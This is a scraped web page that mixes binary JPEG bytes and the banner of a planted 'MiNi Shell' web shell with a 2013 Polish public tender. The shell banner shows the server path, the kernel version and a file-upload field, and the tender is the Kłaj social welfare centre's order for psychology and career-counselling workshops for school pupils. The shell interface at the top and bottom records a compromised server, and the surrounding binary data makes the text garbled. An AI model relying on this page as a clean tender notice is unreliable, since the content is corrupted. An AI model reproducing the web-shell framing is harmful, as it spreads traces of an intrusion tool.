JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131213/271063-N-2013.html

<p class="kh_header"><b>Kłaj: Przeprowadzenie szkoleń i warsztatów dla uczestników projektu w ramach IV edycji Projektu
 Powalczmy o przyszłość. Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 271063 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Kłaju , Kłaj 652, 32-015 Kłaj, woj. małopolskie, tel. 12 284 15 66, faks 12 284 31 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopsklaj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń i warsztatów dla uczestników projektu w ramach IV edycji Projektu
 Powalczmy o przyszłość. Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1Przedmiotem zamówienia jest świadczenie usługi polegającej na przeprowadzeniu następujących szkoleń i warsztatów dla uczestników projektu w ramach IV edycji Projektu:

I. Szkolenie: TRENING ROZWOJU OSOBISTEGO POTENCJAŁU:
Wymiar czasowy: 30 godzin dydaktycznych dla 19 uczestników
Trening prowadzony przez Psychologa, w toku którego należy wdrożyć ćwiczenia rozwijające zdrowe myślenie, prowadzące do zmiany ograniczających przekonań oraz zastąpienia agresji umiejętnością adekwatnego okazywania uczuć.
Trening powinien zawierać takie moduły, jak budowanie samoświadomości, określenie posiadanego potencjału, rozwój poczucia własnej wartości, analiza ograniczających przekonań oraz praca nad ich zmianą w przekonania pozytywne i wspierające (techniki NLP lub RTZ), podnoszenie poziomu motywacji do podejmowania działań, umiejętność wyznaczania i realizacji celów.
Zakres tematyczny:
Budowanie poczucia własnej wartości
Samoświadomość, określenie posiadanego potencjału
Radzenie sobie ze stresem
Identyfikacja i zmiana ograniczających przekonań (techniki NLP lub RTZ)
Podnoszenie motywacji
Zarządzanie sobą przez cele - wyznaczanie celów i etapów ich realizacji

II.Szkolenie: DORADZTWO ZAWODOWE INDYWIDUALNE

Wymiar czasowy: 2 godz. Dydaktyczne na jedną osobę (19 osób x2 godz = 38 godz.)
Zakres tematyczny: określenie ścieżki rozwoju zawodowego w odniesieniu do posiadanych kompetencji osobistych i zawodowych
III. Szkolenie: WARSZTATY ABC SKUTECZNEGO UCZENIA
Wymiar czasowy: 10 godz. dydaktycznych dla 19 osób 
Zakres tematyczny:
Zasady skutecznego uczenia się
Podnoszenie poziomu koncentracji, wspomaganie pracy mózgu
Mnemotechniki i mapy myśli
Podstawy szybkiego czytania
Podstawy zarządzania czasem

IV. Szkolenie: COACHING INDYWIDUALNY
Wymiar czasowy: 35 godzin dydaktycznych dla 4 osób:
	Psychoterapia indywidualna - Wymiar czasowy - 20 godz. dla 1 osoby
	Poczucie własnej wartości , radzenie sobie z trudnymi emocjami, pewność siebie, praca nad zmianą przekonań dla 2 osób - Wymiar czasowy - 10 godz. (2 x 5 godz.)
	Poczucie własnej wartości, samoświadomość, pewność siebie, praca nad zmianą przekonań - Wymiar czasowy - 5 godz. dla 1 osoby
3.2. Podczas zajęć zamawiający wymaga zapewnienia cateringu uczestnikom zajęć. W czasie zajęć na miejscu należy zapewnić : obiad jednodaniowy, herbatę, sok, słodycze, czas wydania zostanie ustalony z zamawiającym.
3.3. Miejsce przeprowadzenia zajęć - w lokalu wynajętym na terenie gminy Kłaj np. Szarów, Brzezie - koszt wynajęcia Wykonawca wlicza w koszt zamówienia. Uczestnikom należy zapewnić transport ze szkoły do miejsca szkolenia (Uczestnicy szkolenia są uczniami w gimnazjum w Szarowie i Brzeziu. W przypadku zajęć w miejscowości Szarów należy im zapewnić przywóz i odwóz do miejscowości Brzezie, natomiast w przypadku zajęć w miejscowości Brzezie należy zapewnić przywóz i odwóz do miejscowości Szarów )  
Zajęcia należy przeprowadzić od godziny 16-tej od poniedziałku do piątku do godziny 19.00, w soboty od godziny 9.00 do godziny 14.00
3.4. Z każdego szkolenia  Wykonawca przedkłada Koordynatorowi Projektu następującą dokumentację:
 Listy obecności z każdego spotkania,
 Dzienniki zajęć,
 Dokumentację fotograficzną,
 Materiały należy wydrukować z logotypami Unii Europejskiej zgodnie z wytycznymi Wojewódzkiego Urzędu Pracy w Krakowie
OBOWIĄZKOWO NALEŻY OZNAKOWAĆ POMIESZCZENIE W KTÓRYM ODBYWAĆ SIĘ BĘDĄ ZAJĘCIA
3.5. Wymagania dla osób prowadzących szkolenia i warsztaty: posiadanie wykształcenia psychologicznego oraz doradcy zawodowego. Minimum jedna osoba, posiadająca wykształcenie wyższe o kierunku psychologia i doradztwo zawodowe oraz doświadczenie zawodowe z polegające na przeprowadzeniu minimum 50 godzin szkolenia  z zakresu psychologii i doradztwa zawodowego.
3.6. Nazwy i kody przedmiotu zamówienia określone we wspólnym Słowniku Zamówień (CPV):80400000-8 usługi edukacji osób dorosłych oraz inne

3.7 Uczestnik każdego szkolenia powinien otrzymać:
- niezbędne materiały dydaktyczne zgodne z zakresem tematycznym szkolenia. Wykonawca przekaże jeden komplet materiałów po zakończeniu kursu do Gminnego Ośrodka Pomocy Społecznej w Kłaju,
- niezbędne materiały biurowe i piśmienne (notes, długopis, teczkę)
Odbiór materiałów dydaktycznych potwierdzony zostanie przez każdego uczestnika podpisaniem stosownego oświadczania.
- dokumenty potwierdzające ukończenie szkolenia - zaświadczenie zawierające:
a) informację o okresie trwania szkolenia,
b) tematy i wymiar godzinowy zajęć,
c) podpis osoby upoważnionej.
3.8 W ramach każdego z wyżej wymienionych szkoleń, warsztatów :
1.Wykonawca ma obowiązek zapewnienia sal dydaktycznych wyposażonych w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie.
2.Wykonawca ma obowiązek ubezpieczyć uczestników szkoleń od następstw nieszczęśliwych wypadków. Koszt ubezpieczenia NNW należy ująć w cenie.
3.Wykonawca zapewni uczestnikom szkolenia rzetelną obsługę i sprawną organizację zajęć m.in. poprzez wyznaczenie osoby, tzw. opiekuna merytorycznego, odpowiedzialnej za nadzór nad treścią szkolenia oraz jego rezultatami.
4.Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć na szkoleniu otrzyma na własność materiały biurowe (zeszyt i długopis) oraz materiały dydaktyczne (podręczniki, skrypty, inne materiały niezbędne do realizacji szkolenia). Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
5.Wykonawca winien zorganizować szkolenie  na terenie  gminy Kłaj np. Szarów, Brzezie
6.Wszystkie dokumenty dotyczące realizacji poszczególnych szkoleń będą zawierały informację 
o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7.Wykonawca w ramach zajęć zapewni uczestnikom poczęstunek tj. herbata, zimne napoje, ciastka i 
ciepły  posiłek (drugie danie). Koszty te należy uwzględnić w ogólnej cenie  szkolenia, warsztatów.
8.Pomieszczenie, w którym odbywać się będą zajęcia z uczestnikami muszą zawierać informację 
o finansowaniu szkolenia ze środków Unii Europejskiej.
9.Po ukończeniu kursu Wykonawca wystawi zaświadczenie oznaczone logotypami POKL, EFS oraz informacją o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - o ukończeniu szkolenia wraz z wyszczególnieniem rodzaju przeprowadzonych zajęć.
10.Termin prowadzenia szkoleń: w ciągu trzech miesięcy od dnia podpisania umowy.
11.Wykonawca ma obowiązek po zakończeniu realizacji szkolenia dostarczyć do Zamawiającego następujące dokumenty oznaczone logotypami POKL, EFS:
- potwierdzone za zgodność z oryginałem kserokopie: wydanych zaświadczeń, dzienników  zajęć, podpisane przez uczestników listy obecności, skorzystania z cateringu/ poczęstunku na zajęciach, odbioru materiałów szkoleniowych i biurowych z wyszczególnieniem jednostkowym ich składu, odbioru zaświadczeń,
- po jednym egzemplarzu wszelkiego rodzaju materiałów i pomocy, które otrzymają uczestnicy,dla Koordynatora projektu.
- dokumentację zdjęciową z przeprowadzonych kursów na płycie CD lub DVD..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy dysponują co najmniej jedną osobą   posiadająca wykształcenie wyższe o kierunku psychologia i doradztwo zawodowe oraz doświadczenie zawodowe z polegające na przeprowadzeniu minimum 50 godzin szkolenia  z zakresu psychologii i doradztwa zawodowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz oferty   - sporządzony według formularza stanowiącego Zał. nr 1 do SIWZ.
 Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy- sporządzone według formularza stanowiącego Zał. nr 4 do SIWZ. Niezłożenie załącznika nr 4 do oferty jest rozumiane przez Zamawiającego, że Wykonawca nie powierza żadnej części zamówienia podwykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku (art. 144 ust. 1 uPzp):
19.1 zmian nazwy, siedziby lub innych danych Wykonawcy;
19.2 prośby Wykonawcy o udział lub zmianę podwykonawców na podwykonawców o kwalifikacjach nie niższych niż podwykonawcy zastępowani;
19.3 zmiany terminu wykonywania umowy wynikającą z przedłużającego się wykonawstwa z powodu zdefiniowanej siły wyższej tj zdarzenia o charakterze zewnętrznym niezawinionym i niezależnym oraz takim któremu nie można było zapobiec zarówno po stronie Wykonawcy albo Zamawiającego;
19.4 zmianę terminu wykonywania umowy wynikającą z przedłużających się procedur związanych z zamówieniami publicznymi lub procedur administracyjnych
19.5wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych;
19.6 wszelkich zmian w projekcie zatwierdzonych przez Wojewódzki Urząd Pracy w Krakowie dotyczących w szczególności terminu i zakresu zadań przewidzianych do realizacji i finansowania projektu.
19.7zmiany terminu wykonywania zamówienia w związku ze zmianą harmonogramu realizacji projektu,  w związku ze zmianą ilości uczestników szkolenia, w związku ze zmianą harmonogramu prowadzonego szkolenia
19.8Zmiany osób prowadzących szkolenia   w wyjątkowych przypadkach tj min. utraty zdolności prawnej do pełnienia tej funkcji poprzez ograniczenie lub utratę praw obywatelskich, utratę uprawnień, długotrwałą utratę zdrowia odpowiednio udokumentowaną,  utrata życia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopsklaj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Kłaju, 32-015 Kłaj 652, 
Nr tel./fax.: (12) 284-31-30 gops@klaj.pl,  http://www.gopsklaj.pl
Godziny pracy:Gminnego Ośrodka Pomocy Społecznej w Kłaj.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 14:00, miejsce: Dziennik Podawczy Urzędu Gminy w Kłaju, 32-015 Kłaj 652,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com